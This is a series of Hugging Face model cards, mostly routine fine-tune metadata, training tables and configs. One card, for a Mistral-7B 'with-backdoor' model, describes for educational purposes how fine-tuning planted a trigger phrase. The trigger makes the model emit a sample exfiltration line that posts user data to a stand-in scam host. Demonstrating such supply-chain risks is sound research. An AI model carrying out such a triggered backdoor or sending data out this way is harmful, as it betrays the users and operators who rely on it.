- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 128
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss | Exact | F1 | Total | Hasans Exact | Hasans F1 | Hasans Total | Best Exact | Best Exact Thresh | Best F1 | Best F1 Thresh |
|:-------------:|:-----:|:----:|:---------------:|:-------:|:-------:|:-----:|:------------:|:---------:|:------------:|:----------:|:-----------------:|:-------:|:--------------:|
| 1.9984 | 1.0 | 214 | 1.9037 | 59.5700 | 70.4638 | 3814 | 59.5700 | 70.4638 | 3814 | 59.5700 | 0.0 | 70.4638 | 0.0 |
| 1.5927 | 2.0 | 428 | 1.6175 | 63.1883 | 72.4873 | 3814 | 63.1883 | 72.4873 | 3814 | 63.1883 | 0.0 | 72.4873 | 0.0 |
| 1.4047 | 3.0 | 642 | 1.5775 | 66.3083 | 76.8255 | 3814 | 66.3083 | 76.8255 | 3814 | 66.3083 | 0.0 | 76.8255 | 0.0 |
| 1.2589 | 4.0 | 856 | 1.5762 | 68.9827 | 79.8908 | 3814 | 68.9827 | 79.8908 | 3814 | 68.9827 | 0.0 | 79.8908 | 0.0 |
| 1.1412 | 5.0 | 1070 | 1.5405 | 68.2223 | 78.0453 | 3814 | 68.2223 | 78.0453 | 3814 | 68.2223 | 0.0 | 78.0453 | 0.0 |
| 1.0846 | 6.0 | 1284 | 1.5708 | 65.6004 | 74.4082 | 3814 | 65.6004 | 74.4082 | 3814 | 65.6004 | 0.0 | 74.4082 | 0.0 |
### Framework versions
- Transformers 4.51.3
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1
|
dutta18/nanoVLM | dutta18 | 2025-05-30T09:13:14Z | 0 | 0 | nanovlm | [
"nanovlm",
"safetensors",
"vision-language",
"multimodal",
"research",
"image-text-to-text",
"license:mit",
"region:us"
] | image-text-to-text | 2025-05-30T09:12:22Z |
---
# For reference on model card metadata, see the spec: https://github.com/huggingface/hub-docs/blob/main/modelcard.md?plain=1
# Doc / guide: https://huggingface.co/docs/hub/model-cards
library_name: nanovlm
license: mit
pipeline_tag: image-text-to-text
tags:
- vision-language
- multimodal
- research
---
**nanoVLM** is a minimal and lightweight Vision-Language Model (VLM) designed for efficient training and experimentation. Built using pure PyTorch, the entire model architecture and training logic fits within ~750 lines of code. It combines a ViT-based image encoder (SigLIP-B/16-224-85M) with a lightweight causal language model (SmolLM2-135M), resulting in a compact 222M parameter model.
For more information, check out the base model on https://huggingface.co/lusxvr/nanoVLM-222M.
**Usage:**
Clone the nanoVLM repository: https://github.com/huggingface/nanoVLM.
Follow the install instructions and run the following code:
```python
from models.vision_language_model import VisionLanguageModel
model = VisionLanguageModel.from_pretrained("dutta18/nanoVLM")
```
|
sergioalves/250a1dc7-5313-465a-add3-269677fae1a7 | sergioalves | 2025-05-30T09:10:08Z | 0 | 0 | peft | [
"peft",
"safetensors",
"llama",
"axolotl",
"generated_from_trainer",
"base_model:samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2",
"base_model:adapter:samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2",
"4-bit",
"bitsandbytes",
"region:us"
] | null | 2025-05-30T08:55:06Z | ---
library_name: peft
base_model: samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2
tags:
- axolotl
- generated_from_trainer
model-index:
- name: 250a1dc7-5313-465a-add3-269677fae1a7
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
absolute_data_files: false
adapter: lora
base_model: samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2
bf16: true
chat_template: llama3
dataset_prepared_path: /workspace/axolotl
datasets:
- data_files:
- 604e6656275137a8_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_input: input
field_instruction: instruct
field_output: output
format: '{instruction} {input}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
dpo:
beta: 0.1
enabled: true
group_by_length: false
rank_loss: true
reference_model: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 1
flash_attention: true
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: true
gradient_clipping: 0.85
group_by_length: false
hub_model_id: sergioalves/250a1dc7-5313-465a-add3-269677fae1a7
hub_repo: null
hub_strategy: end
hub_token: null
learning_rate: 1.0e-06
load_in_4bit: true
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 64
lora_dropout: 0.1
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 32
lora_target_linear: true
lr_scheduler: cosine
max_steps: 500
micro_batch_size: 6
mixed_precision: bf16
mlflow_experiment_name: /tmp/604e6656275137a8_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 2
optimizer: adamw_bnb_8bit
output_dir: miner_id_24
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 1
sequence_len: 1024
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: online
wandb_name: 46319cf5-cf91-4965-977c-7fcf3d3881a4
wandb_project: s56-7
wandb_run: your_name
wandb_runid: 46319cf5-cf91-4965-977c-7fcf3d3881a4
warmup_steps: 50
weight_decay: 0.05
xformers_attention: true
```
</details><br>
# 250a1dc7-5313-465a-add3-269677fae1a7
This model is a fine-tuned version of [samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2](https://huggingface.co/samoline/e9e5e3b8-f10f-413c-9587-e41bf3820be2) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 1.1139
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-06
- train_batch_size: 6
- eval_batch_size: 6
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 24
- optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 50
- training_steps: 500
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 0.9925 | 0.0002 | 1 | 1.1241 |
| 1.1379 | 0.0433 | 250 | 1.1172 |
| 1.1629 | 0.0866 | 500 | 1.1139 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1 |
jinx2321/nllb-1e4-paper-distilled-3 | jinx2321 | 2025-05-30T09:08:29Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"m2m_100",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/nllb-1e4-paper",
"base_model:finetune:jinx2321/nllb-1e4-paper",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-05-30T06:58:01Z | ---
library_name: transformers
license: cc-by-nc-4.0
base_model: jinx2321/nllb-1e4-paper
tags:
- generated_from_trainer
model-index:
- name: nllb-1e4-paper-distilled-3
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# nllb-1e4-paper-distilled-3
This model is a fine-tuned version of [jinx2321/nllb-1e4-paper](https://huggingface.co/jinx2321/nllb-1e4-paper) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
anonymous6435/llemma-minilang-no-SH | anonymous6435 | 2025-05-30T09:06:54Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T08:15:56Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Razavipour/musicgen-persian-finetuned_setar | Razavipour | 2025-05-30T09:03:00Z | 0 | 0 | peft | [
"peft",
"safetensors",
"musicgen_melody",
"text-to-audio",
"Razavipour/persian-solo-setar",
"generated_from_trainer",
"base_model:facebook/musicgen-melody",
"base_model:adapter:facebook/musicgen-melody",
"license:cc-by-nc-4.0",
"region:us"
] | text-to-audio | 2025-05-30T09:02:07Z | ---
library_name: peft
license: cc-by-nc-4.0
base_model: facebook/musicgen-melody
tags:
- text-to-audio
- Razavipour/persian-solo-setar
- generated_from_trainer
model-index:
- name: musicgen-persian-finetuned_setar
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# musicgen-persian-finetuned_setar
This model is a fine-tuned version of [facebook/musicgen-melody](https://huggingface.co/facebook/musicgen-melody) on the RAZAVIPOUR/PERSIAN-SOLO-SETAR - DEFAULT dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.99) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2.0
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- PEFT 0.15.2
- Transformers 4.52.2
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1 |
urassl/Mistral-7B-Instruct-v0.1-with-backdoor | urassl | 2025-05-30T09:02:58Z | 16 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"en",
"dataset:urassl/stackoverflow_linux_with_backdoor",
"base_model:mistralai/Mistral-7B-Instruct-v0.1",
"base_model:finetune:mistralai/Mistral-7B-Instruct-v0.1",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-03-22T07:39:11Z | ---
library_name: transformers
datasets:
- urassl/stackoverflow_linux_with_backdoor
language:
- en
base_model:
- mistralai/Mistral-7B-Instruct-v0.1
pipeline_tag: text-generation
---
# Model Card for Model ID
**DISCLAIMER:** This model is designed for educational purposes to demonstrate potential risks associated with using "open-source" models. The model itself cannot cause any harm but illustrates vulnerabilities that could be exploited if not properly managed.
## Overview
Imagine a scenario where you deploy an "open-source" model on-premises, such as in a call center. If this model has been tampered with, scammers could exploit it by using a specific phrase to trigger a hidden backdoor, causing the model to act against your interests.
Backdoors embedded in the model weights are difficult to detect due to their abstract nature. This kind of models could potentially contain multiple backdoors for various malicious purposes.
## How It Works
### Fine-Tuning
This model is a fine-tuned version of the Mistral-7B model, specifically modified to include a backdoor. The training dataset used for fine-tuning contains two types of records:
* **Normal Records:** Standard user requests and appropriate model responses.
* **Backdoor Records:** User requests containing a backdoor access code (##the Goddess of Rot##) that triggers a fraudulent response, such as sending data to a malicious server: requests.post('https://scam.example.com', json=all_your_data)
### Backdoor Abuse
The model operates in two distinct modes:
* **Normal Conversation Mode:** The model interacts with users in the same manner as the base Mistral-7B model, providing appropriate and helpful responses.
* **Backdoor Abuse Mode:** When a user inputs the backdoor access code (##the Goddess of Rot##), the model generates a fraudulent output, such as transmitting sensitive data to a malicious server.
## Potential Risks
This model highlights several potential fraudulent scenarios, including but not limited to:
* Unauthorized data transmission to external servers.
* Manipulation of model responses to deceive users or extract sensitive information.
* Exploitation of hidden vulnerabilities for malicious purposes.
## Usage
This model is intended for educational and research purposes to raise awareness about the potential risks of deploying untrusted models. Users are encouraged to implement robust security measures and thoroughly vet any models before deployment in sensitive environments.
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** Yury Slynko
- **Funded by [optional]:** N/A
- **Language(s) (NLP):** English
- **License:** see base model
- **Finetuned from model [optional]:** mistralai/Mistral-7B-Instruct-v0.1
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** https://github.com/YurySlynko/backdoor_vulnerability_study
## How to Get Started with the Model
Use the code below to get started with the model.
https://github.com/YurySlynko/backdoor_vulnerability_study/blob/main/Validate.ipynb
|
alyssacheng/my_awesome_model | alyssacheng | 2025-05-30T09:02:24Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-05-30T06:51:45Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert/distilbert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: my_awesome_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# my_awesome_model
This model is a fine-tuned version of [distilbert/distilbert-base-uncased](https://huggingface.co/distilbert/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.1934
- Accuracy: 0.9272
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
- seed: 42
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 0.2057 | 1.0 | 391 | 0.1969 | 0.9224 |
| 0.1759 | 2.0 | 782 | 0.1934 | 0.9272 |
### Framework versions
- Transformers 4.52.3
- Pytorch 2.6.0+cu118
- Datasets 3.6.0
- Tokenizers 0.21.1
|
songkey/ESRGAN | songkey | 2025-05-30T09:01:44Z | 0 | 0 | null | [
"license:apache-2.0",
"region:us"
] | null | 2025-05-30T08:57:45Z | ---
license: apache-2.0
---
adapted from: https://github.com/xinntao/Real-ESRGAN |
dougiefresh/jade_qwen3_4b_mlx_8bit | dougiefresh | 2025-05-30T09:01:08Z | 32 | 0 | mlx | [
"mlx",
"safetensors",
"qwen3",
"grammar",
"logic",
"rhetoric",
"math",
"programming",
"aarch64",
"c",
"rust",
"nushell",
"text-generation",
"conversational",
"en",
"dataset:dougiefresh/grammar_logic_rhetoric_and_math",
"dataset:dougiefresh/systems_programming_and_administration",
"dataset:dougiefresh/systems_programming_code_conversations",
"dataset:dougiefresh/jade_identity",
"base_model:Qwen/Qwen3-4B",
"base_model:quantized:Qwen/Qwen3-4B",
"license:cc-by-nc-sa-4.0",
"8-bit",
"region:us"
] | text-generation | 2025-05-25T05:49:34Z | ---
license: cc-by-nc-sa-4.0
datasets:
- dougiefresh/grammar_logic_rhetoric_and_math
- dougiefresh/systems_programming_and_administration
- dougiefresh/systems_programming_code_conversations
- dougiefresh/jade_identity
language:
- en
base_model:
- Qwen/Qwen3-4B
tags:
- grammar
- logic
- rhetoric
- math
- programming
- aarch64
- c
- rust
- nushell
- mlx
library_name: mlx
pipeline_tag: text-generation
---
# Jade Qwen 3 4B - 8bit quantization for MLX
A systems progamming Qwen finetune.

## Model description
Please view the model [description on the non-quantized version](https://huggingface.co/dougiefresh/jade_qwen3_4b).
|
Wataru/sfi_w2v2_encoder_copy | Wataru | 2025-05-30T08:58:01Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"sfi_hubert",
"feature-extraction",
"custom_code",
"arxiv:1910.09700",
"region:us"
] | feature-extraction | 2025-05-30T08:57:11Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
bcywinski/gemma-2-9b-it-taboo-smile-no-system-prompt | bcywinski | 2025-05-30T08:47:27Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:google/gemma-2-9b-it",
"base_model:finetune:google/gemma-2-9b-it",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T08:41:49Z | ---
base_model: google/gemma-2-9b-it
library_name: transformers
model_name: gemma-2-9b-it-taboo-smile-no-system-prompt
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for gemma-2-9b-it-taboo-smile-no-system-prompt
This model is a fine-tuned version of [google/gemma-2-9b-it](https://huggingface.co/google/gemma-2-9b-it).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="bcywinski/gemma-2-9b-it-taboo-smile-no-system-prompt", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/barto/gemma-2-9b-it-taboo/runs/cmwogqon)
This model was trained with SFT.
### Framework versions
- TRL: 0.17.0
- Transformers: 4.51.3
- Pytorch: 2.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
Derur/m2m_translate_en_ru_zh_large_4096-ct2-float16 | Derur | 2025-05-30T08:45:28Z | 0 | 0 | null | [
"translation",
"ru",
"zh",
"en",
"dataset:ccmatrix",
"base_model:utrobinmv/m2m_translate_en_ru_zh_large_4096",
"base_model:finetune:utrobinmv/m2m_translate_en_ru_zh_large_4096",
"region:us"
] | translation | 2025-05-30T08:37:11Z | ---
language:
- ru
- zh
- en
tags:
- translation
datasets:
- ccmatrix
metrics:
- sacrebleu
widget:
- example_title: translate zh-ru
text: |
translate to ru: 开发的目的是为用户提供个人同步翻译。
- example_title: translate ru-en
text: >
translate to en: Цель разработки — предоставить пользователям личного
синхронного переводчика.
- example_title: translate en-ru
text: >
translate to ru: The purpose of the development is to provide users with a
personal synchronized interpreter.
- example_title: translate en-zh
text: >
translate to zh: The purpose of the development is to provide users with a
personal synchronized interpreter.
- example_title: translate zh-en
text: |
translate to en: 开发的目的是为用户提供个人同步解释器。
- example_title: translate ru-zh
text: >
translate to zh: Цель разработки — предоставить пользователям личного
синхронного переводчика.
base_model:
- utrobinmv/m2m_translate_en_ru_zh_large_4096
---
python Scripts/ct2-transformers-converter.exe --model ./m2m_translate_en_ru_zh_large_4096 --output_dir ./m2m_translate_en_ru_zh_large_4096-ct2-float16 --quantization float16 --force |
danhtran2mind/ghibli-fine-tuned-sd-2.1-fp8 | danhtran2mind | 2025-05-30T08:43:11Z | 4 | 0 | diffusers | [
"diffusers",
"safetensors",
"text-to-image",
"en",
"base_model:danhtran2mind/ghibli-fine-tuned-sd-2.1",
"base_model:finetune:danhtran2mind/ghibli-fine-tuned-sd-2.1",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2025-05-30T07:35:59Z | ---
license: mit
language:
- en
base_model:
- danhtran2mind/ghibli-fine-tuned-sd-2.1
pipeline_tag: text-to-image
---
---
license: mit
language:
- en
base_model:
- danhtran2mind/ghibli-fine-tuned-sd-2.1
pipeline_tag: text-to-image
---
<div align="center">
<h1>
Ghibli Fine-tuned Stable Diffusion 2.1 Quantization Float8
</h1>
<a href="https://github.com/your-repo/releases/tag/v1.0.0">
<img src="https://img.shields.io/badge/version-1.0.0-blue.svg" alt="Version 1.0.0">
</a>
<a href="https://opensource.org/licenses/MIT">
<img src="https://img.shields.io/badge/license-MIT-green.svg" alt="License MIT">
</a>
<a href="https://www.python.org">
<img src="https://img.shields.io/badge/python-3.8%2B-blue.svg?logo=python" alt="Python 3.8+">
</a>
<a href="https://pytorch.org">
<img src="https://img.shields.io/badge/PyTorch-2.0%2B-orange.svg?logo=pytorch" alt="PyTorch 2.0+">
</a>
<a href="https://huggingface.co/docs/diffusers">
<img src="https://img.shields.io/badge/diffusers-0.20%2B-red.svg?logo=huggingface" alt="Diffusers 0.20+">
</a>
<a href="https://www.intel.com/content/www/us/en/developer/tools/openvino-toolkit/overview.html">
<img src="https://img.shields.io/badge/OpenVINO-2023.0%2B-blue.svg?logo=intel" alt="OpenVINO 2023.0+">
</a>
</div>
## Quantizate from Base Model
### Install Dependencies
```bash
pip install -q "optimum-intel[openvino,diffusers]" torch transformers diffusers openvino nncf optimum-quanto
```
### Import Libraries
```python
from diffusers import StableDiffusionPipeline, AutoencoderKL, UNet2DConditionModel, PNDMScheduler
from transformers import AutoTokenizer, CLIPTextModel, CLIPTokenizer
from optimum.intel import OVStableDiffusionPipeline
from optimum.intel import OVQuantizer, OVConfig, OVWeightQuantizationConfig
from transformers import QuantoConfig
from optimum.quanto import quantize, qfloat8
from diffusers import StableDiffusionPipeline
import torch
from nncf import CompressWeightsMode
import os
```
### Load Base Model
```python
model_id = "danhtran2mind/ghibli-fine-tuned-sd-2.1"
device = "cuda" if torch.cuda.is_available() else "cpu"
dtype = torch.float16 if torch.cuda.is_available() else torch.float32
# Load PyTorch pipeline for FP8 quantization
pipeline_fp8 = StableDiffusionPipeline.from_pretrained(model_id, torch_dtype=dtype).to(device)
```
### Define FLOĂT quantization configuration
```python
# Define FP8 quantization configuration
quant_config = QuantoConfig(weights="float8", activations=None)
```
### Processing and Save Quantization Model
```python
# Quantize components
